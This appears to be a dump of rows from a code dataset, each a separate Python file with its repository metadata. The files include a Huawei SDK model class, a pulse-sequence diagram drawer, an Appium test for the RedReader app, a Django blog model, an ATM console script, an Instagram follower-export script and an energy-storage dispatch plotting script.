"""ListChildIssuesV4Response - a model defined in huaweicloud sdk"""
super(ListChildIssuesV4Response, self).__init__()
self._issues = None
self._total = None
self.discriminator = None
if issues is not None:
self.issues = issues
if total is not None:
self.total = total
@property
def issues(self):
"""Gets the issues of this ListChildIssuesV4Response.
工作项列表
:return: The issues of this ListChildIssuesV4Response.
:rtype: list[IssueResponseV4]
"""
return self._issues
@issues.setter
def issues(self, issues):
"""Sets the issues of this ListChildIssuesV4Response.
工作项列表
:param issues: The issues of this ListChildIssuesV4Response.
:type: list[IssueResponseV4]
"""
self._issues = issues
@property
def total(self):
"""Gets the total of this ListChildIssuesV4Response.
总数
:return: The total of this ListChildIssuesV4Response.
:rtype: int
"""
return self._total
@total.setter
def total(self, total):
"""Sets the total of this ListChildIssuesV4Response.
总数
:param total: The total of this ListChildIssuesV4Response.
:type: int
"""
self._total = total
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListChildIssuesV4Response):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
eb63614dcb72063dcd495c50b186136197606a99 | 7f5972e57c4336a0fbc084ca7ce486fc87080d57 | /seq_draw/seq_draw.py | 3e5a77c010aa7d28bf9b253de620f03e8da5dc4d | [
"MIT"
] | permissive | deepdumbo/seq_draw | 87c571e9d80c5fdb7d82422fbedc2819e34a4203 | 8107a651186495c0cde62bc4833cb78ff7c6f8d9 | refs/heads/master | 2020-07-02T17:11:39.360881 | 2017-11-08T13:40:10 | 2017-11-08T13:40:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,182 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import copy
import atoms
import misc
class SeqDiagram(object):
def __init__(self, ax=None):
if ax is None:
self.ax = plt.axes([0, 0, 1, 1], frameon=False)
else:
self.ax = ax
self.sqaxes = {}
pass
def __str__(self):
_str = ''
for axis in self.sqaxes.keys():
_str += 'Axis {0:s}:\n'.format(axis)
time_sum = 0.0
for i, atom in enumerate(self.sqaxes[axis]['atoms']):
_str += ' {0:2.3f}: {1:s}\n'.format(time_sum, atom)
time_sum += atom.duration
_str += 'Sum {0:2.3f}\n'.format(time_sum)
return _str
__repr__ = __str__
@property
def ax(self):
return self._ax
@ax.setter
def ax(self, new_ax):
self._ax = new_ax
# remove locators
self._ax.axes.get_xaxis().set_visible(False)
self._ax.axes.get_yaxis().set_visible(False)
pass
def add_axis(self, name, offset_x, offset_y, label=None, label_duration=0.9, plot_kw={}, font_kw={}):
if name in self.sqaxes.keys():
raise Exception('Axis ' + str(name) + ' alreadiy exists.')
self.init_axis(name)
self.sqaxes[name]['offset_x'] = offset_x
self.sqaxes[name]['offset_y'] = offset_y
self.sqaxes[name]['offset_x_init'] = offset_x
self.sqaxes[name]['offset_y_init'] = offset_y
if not (label is None):
self.add_atom(misc.AxisLabel(self, name, label, label_duration, plot_kw=plot_kw, font_kw=font_kw), axis=name)
pass
def init_axis(self, name):
self.sqaxes[name] = {'offset_x': 0.0, 'offset_y': 0.0, 'atoms': list()}
pass
def reset_axis(self, name, keep_first=1):
del self.sqaxes[name]['atoms'][keep_first:]
pass
def init_axes(self, label_duration=0.5, plot_kw=dict(), font_kw=dict()):
self.add_axis('rf', 0.0, 0.7, '$RF$', label_duration, plot_kw=plot_kw, font_kw=font_kw)
self.add_axis('gx', 0.0, 0.5, '$G_{R}$', label_duration, plot_kw=plot_kw, font_kw=font_kw)
self.add_axis('gy', 0.0, 0.3, '$G_{P}$', label_duration, plot_kw=plot_kw, font_kw=font_kw)
self.add_axis('gz', 0.0, 0.1, '$G_{S}$', label_duration, plot_kw=plot_kw, font_kw=font_kw)
pass
def reset_axes(self):
for axis in self.sqaxes.keys():
self.reset_axis(axis)
def add_atom(self, atom, axis=None):
if not (axis is None):
atom = self.set_axis(atom, new_axis=axis)
if isinstance(atom, (list, tuple)):
for a in atom:
self.add_atom(a, axis=axis)
else:
if atom.sqaxis in self.sqaxes.keys():
self.sqaxes[atom.sqaxis]['atoms'].append(atom)
else:
raise Exception('Unknown axis ' + atom.sqaxis + '. Possible values are ' + str(self.sqaxes.keys()))
def draw(self, debug=False, debug_intensity=0.075, debug_labels=True):
for axis in self.sqaxes.keys():
for i, pulse in enumerate(self.sqaxes[axis]['atoms']):
pulse.draw()
if debug:
pulse.draw_debug(intensity=debug_intensity, label=debug_labels, index=i)
# reset origin
for axis in self.sqaxes.keys():
self.sqaxes[axis]['offset_x'] = self.sqaxes[axis]['offset_x_init']
self.sqaxes[axis]['offset_y'] = self.sqaxes[axis]['offset_y_init']
def set_axis(self, atom, new_axis):
if isinstance(atom, (list, tuple)):
atom = [self.set_axis(a, new_axis) for a in atom]
else:
if isinstance(atom, atoms.AxesAtom):
atom = copy.copy(atom)
if isinstance(atom, atoms.AtomIterator):
atom.atom = copy.copy(atom.atom)
atom.sqaxis = new_axis
else:
raise Exception('Argument atom needs to be a subclass of AxisAtom or a list of AxisAtoms, but atom is ' + type(atom))
return atom
def get_total_duration(self, atom):
if isinstance(atom, (list, tuple)):
return sum([self.get_total_duration(a) for a in atom])
else:
if isinstance(atom, atoms.AxesAtom):
return atom.duration
raise Exception('Argument atom needs to be a subclass of AxisAtom or a list of AxisAtoms, but atom is ' + type(atom))
def fill(self, axes=None, tp=None, plot_kw={}):
if axes is None:
axes = self.sqaxes.keys()
# compute sum
sums = {}
max_sum = 0.0
max_ax = axes[0]
for ax in axes:
sums[ax] = 0.0
for atom in self.sqaxes[ax]['atoms']:
sums[ax] += atom.duration
if max_sum < sums[ax]:
max_sum = sums[ax]
max_ax = ax
if (not (tp is None)) and tp >= max_sum:
max_sum = tp
max_ax = None
for ax in set(axes) - set([max_ax]):
self.add_atom(misc.Line(self, ax, max_sum - sums[ax], plot_kw=plot_kw), axis=ax)
pass
| [
"markus.boland@dzne.de"
] | markus.boland@dzne.de |
7b25d3a0b38ecf71f28ab8ade8d455c4f755784e | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/redreader/testcase/firstcases/testcase8_000.py | 487ccbe5525b05345cc0e3f99e97b78ace629218 | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,361 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'org.quantumbadger.redreader',
'appActivity' : 'org.quantumbadger.redreader.activities.MainActivity',
'resetKeyboard' : True,
'androidCoverage' : 'org.quantumbadger.redreader/org.quantumbadger.redreader.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
    # Fire-and-forget shell command: let it run for `timeout` seconds, then
    # terminate it.  Used for adb broadcasts whose output is not needed.
    p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
    time.sleep(timeout)
    p.terminate()
    return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
# testcase000
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememtBack(driver, "new UiSelector().text(\"All Subreddits\")", "new UiSelector().className(\"android.widget.TextView\").instance(3)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().className(\"android.widget.TextView\").description(\"Sort Posts\")")
TouchAction(driver).long_press(element).release().perform()
driver.press_keycode(4)
element = getElememt(driver, "new UiSelector().className(\"android.widget.TextView\").description(\"Sort Posts\")")
TouchAction(driver).long_press(element).release().perform()
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"8_000\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'org.quantumbadger.redreader'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage) | [
"prefest2018@gmail.com"
] | prefest2018@gmail.com |
c74462826047dc31ce78bc75478dd40b6448f120 | ef9cb55b02ababca58ce6880b575120c4f28fdb9 | /blog/models.py | acf0d8f124a21c803016a1554c92811cf188da95 | [] | no_license | mikohan/portfolio | dc6226f3aee73b5af181a0ecc9a13668dde2fe4e | 51fda71a4fecec77ff207eb94e514f6924eaf44e | refs/heads/master | 2020-05-30T09:11:51.866902 | 2019-06-04T05:29:27 | 2019-06-04T05:29:27 | 189,637,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 463 | py | from django.db import models
class Blog(models.Model):
title = models.CharField(max_length=255)
pub_date = models.DateTimeField()
body = models.TextField()
image = models.ImageField(upload_to='images/')
def __str__(self):
return self.title
def cut(self):
split = self.body.split()
desc = ' '.join(split[:40])
return desc
def pub_date_pretty(self):
return self.pub_date.strftime('%b %e %Y')
| [
"angara99@gmail.com"
] | angara99@gmail.com |
1a055dfbf5d07851bccb01930a4c863d0fb61b84 | a26630a4a64824603a78f39553e21ae9335bf1f9 | /env/bin/jupyter-qtconsole | b3abca9c7ca3903800a87bde1ac9375889978196 | [
"MIT"
] | permissive | rjhans7/pydata-berlin-2017 | 235b4b990197fedc3f5e59be677df5cae0d8da9c | f0ed356d803f283552597a628af8a4e9deebe49d | refs/heads/master | 2020-06-04T03:11:47.776383 | 2019-06-13T23:28:38 | 2019-06-13T23:28:38 | 191,845,655 | 0 | 0 | null | 2019-06-13T23:22:56 | 2019-06-13T23:22:56 | null | UTF-8 | Python | false | false | 279 | #!/home/roosevelt/Documentos/Duckiebot/pydata-berlin-2017/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from qtconsole.qtconsoleapp import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"roosevelt.ubaldo@outlook.com"
] | roosevelt.ubaldo@outlook.com | |
b91e3e270ea84859952db642e0695052e85dbb6c | f5a5595e1b305ff5a173e1007a4042b1f23182c1 | /Programs/atm_management.py | 6e506e8df78eccfa80dee22c0cd48ba611f80086 | [] | no_license | 3NCRY9T3R/H4CKT0B3RF3ST-2020 | b400c04a411efa40b1e4a4f80fa0f8c3e99fa2df | c56969c05dbda584ff8980b08b9ef1cf1dbe6c42 | refs/heads/main | 2023-08-30T06:07:18.051006 | 2020-11-12T17:47:40 | 2020-11-12T17:47:40 | 300,406,803 | 87 | 186 | null | 2022-09-25T16:21:44 | 2020-10-01T19:52:31 | C++ | UTF-8 | Python | false | false | 1,603 | py | d={}
def deposit(n):
amt=int(input("\nenter the amount you want to deposit"))
d[n][1]=d[n][1]+amt
print(d[n])
def withdraw():
amt=int(input("\nenter the amount you want to withdraw"))
if(d[n][1]>=amt):
d[n][1]=d[n][1]-amt
else:
print("amount is not sufficient")
print(d[n])
def chkamt():
print("\nYour balance is ",d[n][1])
def transfer():
b=input("\nenter the name of account in which you want to transfer")
if b in d:
amt1=int(input("\nenter the amount you want to transfer"))
if(d[n][1]>amt1):
d[n][1]=d[n][1]-amt1
d[b][1]=d[b][1]+amt1
print("balance of n is ",d[n][1])
else:
print("amount not sufficient")
else:
print("entry not found")
n=int(input('Enter range'))
for i in range(0,n):
name=input('Enter Name')
f=input('enter password')
c=int(input('enter balance'))
list=[f,c]
d[name]=list
print(d)
n=input('enter name')
if n in d:
p=input('enter password')
if p in d[n][0]:
print("enter 1:Deposit\n 2:Withdraw\n 3:Transfer\n 4:Check Amount")
while(1):
a=int(input("enter the number"))
if a==1:
deposit(n)
elif a==2:
withdraw()
elif a==3:
transfer()
elif a==4:
chkamt()
else:
print("Please enter correct number")
break
else:
print("incorrect password")
else:
print("entry not found")
| [
"noreply@github.com"
] | 3NCRY9T3R.noreply@github.com |
6a6cb216fa9aee4db2182b77261d6d65dfd2fed7 | d7d524d1c0ba1cf62cdbc2f9bf5b9c66fa56726b | /armstrong interval.py | 626c90c1598da113f54258b1c5f678f4dccdac20 | [] | no_license | ramyasutraye/pythonproject | d997ca5ada024e211b6bf087d0d56684daf9df8b | 38975a99eb3ee1ad9e79a9efd538cc992d249fc3 | refs/heads/master | 2020-04-23T19:30:10.128774 | 2018-05-25T06:18:53 | 2018-05-25T06:18:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | a = int(input("Enter lower range: "))
b = int(input("Enter upper range: "))
for num in range(a, b + 1):
order = len(str(num))
sum = 0
temp = num
while temp > 0:
digit = temp % 10
sum += digit ** order
temp //= 10
if num == sum:
print(num)
| [
"noreply@github.com"
] | ramyasutraye.noreply@github.com |
4e88153bccadd64828090d4a40171e0fc6dc6fce | 55e5bb8f31c6939fb77317973b587c0e9446f996 | /model_manager.py | cc7964ef045248cfe79d73cf91249c75d06d29d5 | [
"MIT"
] | permissive | zwcdp/Classification-on-FashionMNIST | 3f7ce376e4046cf7b957ccef7c8f38e3256a8681 | 1d90b1a7bd49a9490b48a756ad7cd4151474f3bb | refs/heads/master | 2020-04-19T08:08:15.884314 | 2019-01-24T15:35:29 | 2019-01-24T15:35:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,752 | py | import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader
def get_string(*args):
string = ''
for s in args:
string = string + ' ' + str(s)
return string
class Manaeger():
def __init__(self, model, args):
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
self.model = model.to(self.device)
self.lr = args.lr
self.metric = nn.CrossEntropyLoss()
self.optimizer = optim.Adam(self.model.parameters(), lr= self.lr)
self.epoch_num = args.epoch_num
self.batch_size = args.batch_size
self.save_name = args.save
self.log_file = open(args.log, 'w')
self.check_batch_num = args.check_batch_num
self.best = (0, 0) #(epoch num, validation acc)
load_name = args.load
if load_name != None:
weight = torch.load(load_name)
self.model.load_state_dict(weight)
def load_data(self, train_loader, valid_loader):
self.train_loader = train_loader
self.valid_loader = valid_loader
def record(self, message):
self.log_file.write(message)
print(message)
def get_info(self):
info = get_string('Model:', self.model.name(), '\n')
info = get_string(info, 'Learning rate:', self.lr, '\n')
info = get_string(info, 'Epoch number:', self.epoch_num, '\n')
info = get_string(info, 'Batch size:', self.batch_size, '\n')
info = get_string(info, 'Weight name:', self.save_name, '\n')
info = get_string(info, 'Log file:', self.log_file, '\n')
info = get_string(info, '=======================\n\n')
return info
def train(self):
info = self.get_info()
self.record(info)
self.model.train()
for epoch in range(self.epoch_num):
for batch_id, (imgs, labels) in enumerate(self.train_loader):
imgs, labels = imgs.to(self.device), labels.to(self.device)
out = self.model(imgs)
loss = self.metric(out, labels)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
if (batch_id % self.check_batch_num == 0):
result = get_string('Epoch',epoch, '| batch', batch_id, '| Training loss :', loss.item(),'\n')
self.record(result)
self.validate(epoch)
info = get_string('\n# The best model is at epoch', self.best[0], 'with accuracy', self.best[1])
self.record(info)
def validate(self, epoch):
self.model.eval()
loss_total = 0
correct_total = 0
for batch_id, (imgs, labels) in enumerate(self.valid_loader):
imgs, labels = imgs.to(self.device), labels.to(self.device)
out = self.model(imgs)
loss = self.metric(out, labels)
loss_total += loss.item()
pred = out.max(1)[1]
correct = sum(pred == labels).item()
correct_total += correct
loss_avg = loss_total / (batch_id + 1)
acc = correct_total / ((batch_id + 1) * self.batch_size)
line = '\n----------------------------\n'
info = get_string('Validation result for ', epoch, 'epoch\n')
info = get_string(info,'Average loss:', loss_avg, '\n Accuracy:', acc)
info = get_string(line, info, line)
self.record(info)
if acc > self.best[1]:
self.best = (epoch, acc)
torch.save(self.model.state_dict(), self.save_name)
self.record('***** Saved best model! *****\n')
if __name__ == '__main__':
pass | [
"noreply@github.com"
] | zwcdp.noreply@github.com |
122581a07e2d8070c9962d222f51972503a5222d | e7ceb2199a6828a9f8e23eebabca8431397ddaa5 | /turtlecreeklane/python/connections.py | c18a8cdba6d6b32a663febf78a79e5188f375a25 | [] | no_license | houta483/instagramHoughton | ffa5688f08374a60aa5f266b86da7767700b0870 | 54926677b71dcacf637f99dfded9bef13879fee7 | refs/heads/master | 2022-12-20T05:27:22.412263 | 2020-04-09T14:23:51 | 2020-04-09T14:23:51 | 248,631,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,026 | py | import json, pyautogui, re, math, os
from random import randint
import pandas as pd
import tkinter as tk
from datetime import datetime
from dateutil.parser import parse
# ALL THE POTENTIAL DATA WE CAN GET FROM CONNECTIONS
# with open('/Users/Tanner/code/products/Instagram/data.json') as f:
# data = json.load(f)
# rawFollowers = data['followers']
# prettyFollowers = json.dumps(rawFollowers, indent=4)
# rawBlockedUsers = data['blocked_users']
# prettyFollowers = json.dumps(rawBlockedUsers, indent=4)
# rawRestricedUsers = data['restricted_users']
# prettyFollowers = json.dumps(rawRestricedUsers, indent=4)
# rawFollowRequestsSent = data['follow_requests_sent']
# prettyFollowers = json.dumps(rawFollowRequestsSent, indent=4)
# rawFolloring = data['following']
# prettyFollowers = json.dumps(rawFolloring, indent=4)
# rawFollowingHashtags = data['following_hashtags']
# prettyFollowers = json.dumps(rawFollowingHashtags, indent=4)
# rawWhitelistedForSponsorTaggingBy = data['whitelisted_for_sponsor_tagging_by']
# prettyFollowers = json.dumps(rawWhitelistedForSponsorTaggingBy, indent=4)
# rawDismissedSuggestedUSers = data['dismissed_suggested_users']
# prettyFollowers = json.dumps(rawDismissedSuggestedUSers, indent=4)
def createDatabaseAndPopulateWithFollowersDateAndTime(json_file):
with open(json_file) as f:
data = json.load(f)
rawFollowers = data['followers']
df = pd.DataFrame({"IG Handle": ["---"], 'Date Started Following': ['-'], 'Time Started Following': ['-'], 'First Name': ['-'],
'Last Name': ['-'], 'Home State': ['-'], 'Home City': ['-'], 'Aprx Household Income': ['-'],
'Date of Last Story View': ['-'], 'Date of Last Story Engagement': ['-'], '# of Story Engagements': ['-'],
'# of Story Swipe Ups': ['-'], 'Date of Last Post Engagement': ['-'], '# of Post Engagements': ['-'],
'# Post Likes': ['-'], '# of Post Comments': ['-'], 'Response to Story Question Stickers': ['->']})
count = 0
for index in enumerate(rawFollowers.items()):
count = count + 1
print(count)
if (count == 100):
break
dateTime = str(index[1][1])
date = dateTime.split("T")[0]
date = date.split('-')
date = f"{date[1]}-{date[2]}-{date[0]}"
finalDate = datetime.strptime(date, '%m-%d-%Y').date()
time = dateTime.split("T")[1]
finalTime = time.split("+")[0]
df1 = pd.DataFrame({
"IG Handle": [index[1][0]],
'Date Started Following': [finalDate],
'Time Started Following': [finalTime]
})
df = df.append(df1, ignore_index=True)
datatoexcel = pd.ExcelWriter(
"/Users/Tanner/code/products/Instagram/database/InstagramFollowerData.xlsx", engine="xlsxwriter")
df.to_excel(datatoexcel, sheet_name="sheet1")
datatoexcel.save()
if __name__ =="__main__":
if (os.path.exists('/Users/Tanner/code/products/Instagram/database/InstagramFollowerData.xlsx') == False):
createDatabaseAndPopulateWithFollowersDateAndTime()
| [
"houta483@uchicago.edu"
] | houta483@uchicago.edu |
f98141f7c57d16d1a6e2f831aa4d808b9bec153c | 132c55f17da675a2d97e286fdbe21eece5c1435d | /SEM-1.2/Making_Figures/MainFigures_May2020/figure2_dispatch.py | d3764cdf4763dacad3d87dc18e3b19811f8b4a48 | [] | no_license | jacquelinedowling/SEM-long-duration-storage | 19c8a14e8ed43de205f7338d081fea428a1a16f2 | e8171f29cb5624deb5f8ef803680b85169ab3d89 | refs/heads/master | 2022-12-02T02:42:31.370055 | 2020-08-14T21:09:46 | 2020-08-14T21:09:46 | 278,500,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,898 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 6 16:44:40 2018
@author: jacquelinedowling
"""
##===========================================
#Import stuff
##===========================================
from __future__ import division
import os
import sys
import copy
import numpy as np
import pickle
import numpy as np
from numpy import genfromtxt
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib.ticker as ticker
import datetime
from matplotlib.dates import DayLocator, MonthLocator, HourLocator, AutoDateLocator, DateFormatter, drange
from matplotlib.dates import MO, TU, WE, TH, FR, SA, SU, WeekdayLocator
from numpy import arange
from matplotlib.ticker import ScalarFormatter
from matplotlib.ticker import FormatStrFormatter
import matplotlib.cm as cm
import matplotlib.mlab as mlab
import matplotlib.colors as color
solar_c = 'orange'
wind_c = 'blue'
pgp_c = 'pink'
batt_c = 'purple'
dem_c = 'black'
##===========================================
#Read in Base Case: PGP Batteries, Wind Solar
##===========================================
##/Users/jacquelinedowling/SEM-1.1/Output_Data/newcosts/newcosts_PGPbatt_SolarWind.pickle
pickle_in = open('/Users/jacquelinedowling/MEM_Nov2019/SEM-1.2/Output_Data/Oct29_combos/Oct29_combos_SolarWind_PGPbatt.pickle', 'rb')
#pickle_in = open('/Users/jacquelinedowling/Documents/SEM-1.1_20190114/Output_Data/PGPtest5/PGPtest5_WindSolarPGPBatt_2015.pickle','rb')
base = pickle.load(pickle_in)
##===========================================
#Supporting Functions
##===========================================
def func_time_conversion (input_data, window_size, operation_type = 'mean'):
# NOTE: THIS FUNCTION HAS ONLY BEEN VERIFIED FOR PROPER WRAP-AROUND BEHAVIOR
# FOR 'mean'
# For odd windows sizes, easy. For even need to consider ends where you have half hour of data.
N_periods = len(input_data)
input_data_x3 = np.concatenate((input_data,input_data,input_data))
half_size = window_size / 2.
half_size_full = int(half_size) # number of full things for the mean
output_data = np.zeros(len(input_data))
for ii in range(len(output_data)):
if half_size != float (half_size_full): # odd number, easy
if (operation_type == 'mean'):
output_data[ii] = np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1 ])/ float(window_size)
elif(operation_type == 'min'):
output_data[ii] = np.min(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1 ])
elif(operation_type == 'max'):
output_data[ii] = np.max(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1])
elif(operation_type == 'sum'):
output_data[ii] = np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1])
else: # even number need to include half of last ones
if (operation_type == 'mean'):
output_data[ii] = ( np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full ]) \
+ input_data_x3[N_periods + ii - half_size_full -1 ] *0.5 + input_data_x3[N_periods + ii + half_size_full + 1 ] *0.5) / window_size
elif(operation_type == 'min'):
output_data[ii] = np.min(input_data_x3[N_periods + ii - half_size_full -1 : N_periods + ii + half_size_full + 1 ])
elif(operation_type == 'max'):
output_data[ii] = np.max(input_data_x3[N_periods + ii - half_size_full -1 : N_periods + ii + half_size_full + 1 ])
elif(operation_type == 'sum'):
output_data[ii] = (
np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full ])
+ input_data_x3[N_periods + ii - half_size_full -1 ] *0.5 + input_data_x3[N_periods + ii + half_size_full + 1 ] *0.5
)
return output_data
##===========================================
def func_find_period (input_data):
window_size = input_data['window_size']
eff_window_size = copy.deepcopy(window_size) # If even go up to next odd number
if eff_window_size == 2 * int (eff_window_size /2 ): # check if even
eff_window_size = eff_window_size + 1 # if so, add 1
data = input_data['data']
search_option = input_data['search_option']
print_option = input_data['print_option']
# -------------------------------------------------------------------------
# Get the down-scaled data
data_in_window = func_time_conversion(data, eff_window_size, 'mean')
# -------------------------------------------------------------------------
if search_option == 'max':
center_index = int(np.argmax(data_in_window))
value = np.max(data_in_window)
elif search_option == 'min':
center_index = int(np.argmin(data_in_window))
value = np.min(data_in_window)
# -------------------------------------------------------------------------
# If interval would go over boundary, then move inteval
if center_index < int(eff_window_size/2):
center_index = int(eff_window_size/2)
if center_index > len(data)- int(eff_window_size/2) - 1:
center_index = len(data) - 1 - int(eff_window_size/2)
# The same algorithm as in func_time_conversion()
left_index = center_index - int(eff_window_size/2)
right_index = center_index + int(eff_window_size/2)
# -------------------------------------------------------------------------
# output
if print_option == 1:
print ( 'center index = {}, value = {}'.format(center_index, value))
print ( 'left index = {}, right index = {}'.format(left_index, right_index))
output = {
'value': value,
'left_index': left_index,
'right_index': right_index,
'center_index': center_index,
}
return output
##===========================================
def get_cost_contributions(base):
info = base[0]
inputs = base[1]
results = base[2]
# Costs over time
wind_t = (np.multiply(inputs["FIXED_COST_WIND"], results["CAPACITY_WIND"]) +
np.multiply(inputs["VAR_COST_WIND"], results["DISPATCH_WIND"]) )
solar_t = (np.multiply(inputs["FIXED_COST_SOLAR"], results["CAPACITY_SOLAR"]) +
np.multiply(inputs["VAR_COST_SOLAR"], results["DISPATCH_SOLAR"]) )
pgp_t = (np.multiply(inputs["FIXED_COST_PGP_STORAGE"], results["CAPACITY_PGP_STORAGE"]) +
np.multiply(inputs["FIXED_COST_TO_PGP_STORAGE"], results["CAPACITY_TO_PGP_STORAGE"]) +
np.multiply(inputs["FIXED_COST_FROM_PGP_STORAGE"], results["CAPACITY_FROM_PGP_STORAGE"]) +
np.multiply(inputs["VAR_COST_TO_PGP_STORAGE"], results["DISPATCH_TO_PGP_STORAGE"]) +
np.multiply(inputs["VAR_COST_FROM_PGP_STORAGE"], results["DISPATCH_FROM_PGP_STORAGE"]) )
batt_t = (np.multiply(inputs["FIXED_COST_STORAGE"], results["CAPACITY_STORAGE"]) +
np.multiply(inputs["VAR_COST_TO_STORAGE"], results["DISPATCH_TO_STORAGE"]) +
np.multiply(inputs["VAR_COST_FROM_STORAGE"], results["DISPATCH_FROM_STORAGE"]) )
# Mean costs
wind_m = np.mean(wind_t)
solar_m = np.mean(solar_t)
pgp_m = np.mean(pgp_t)
batt_m = np.mean(batt_t)
# print('System Cost Contributions =')
# print(results['SYSTEM_COST'])
# print('My calcs =')
# calc_sys_cost = wind_m + solar_m + pgp_m + batt_m
# print(calc_sys_cost)
return wind_m, solar_m , pgp_m, batt_m
#=========================================
info = base[0]
inputs = base[1]
results = base[2]
#print('Base')
#print('=====================INFO====================================================================')
#print(info)
#print('=====================INPUTS====================================================================')
#print(inputs)
#print('=====================RESULTS====================================================================')
#print(results)
##===========================================================================================================
# (Figure 1: Dispatch Curves)
##============================================================================================================
# 5-day averaging
hours_to_avg = 5*24
demand_source = func_time_conversion(inputs['DEMAND_SERIES'], hours_to_avg)
wind_source = func_time_conversion(results['DISPATCH_WIND'], hours_to_avg)
solar_source = func_time_conversion(results['DISPATCH_SOLAR'], hours_to_avg)
batt_source = func_time_conversion(results['DISPATCH_FROM_STORAGE'], hours_to_avg)
pgp_source = func_time_conversion(results['DISPATCH_FROM_PGP_STORAGE'], hours_to_avg)
demand_sink = np.multiply(func_time_conversion(inputs['DEMAND_SERIES'], hours_to_avg), -1)
batt_sink = np.multiply(func_time_conversion(results['DISPATCH_TO_STORAGE'], hours_to_avg), -1)
pgp_sink = np.multiply(func_time_conversion(results['DISPATCH_TO_PGP_STORAGE'], hours_to_avg), -1)
#=================
#Electricity Sources AND Sinks
#=======================================================
#Figure size settings
#=======================================================
plt.rcParams.update({'axes.titlesize': 'large'})
plt.rcParams.update({'axes.labelsize': 'large'})
#import matplotlib.pylab as pylab
#params = {'legend.fontsize': 'large',
# 'figure.figsize': (12, 6), #7 3.5
# 'axes.labelsize': 'x-large',
# 'axes.titlesize':'x-large',
# 'xtick.labelsize':'large',
# 'ytick.labelsize':'large'}
#pylab.rcParams.update(params)
import matplotlib.pylab as pylab
params = {'legend.fontsize': 'large',
'figure.figsize': (12, 6), #7 3.5
'axes.labelsize': 'x-large',
'axes.titlesize':'x-large',
'xtick.labelsize':'large',
'ytick.labelsize':'large'}
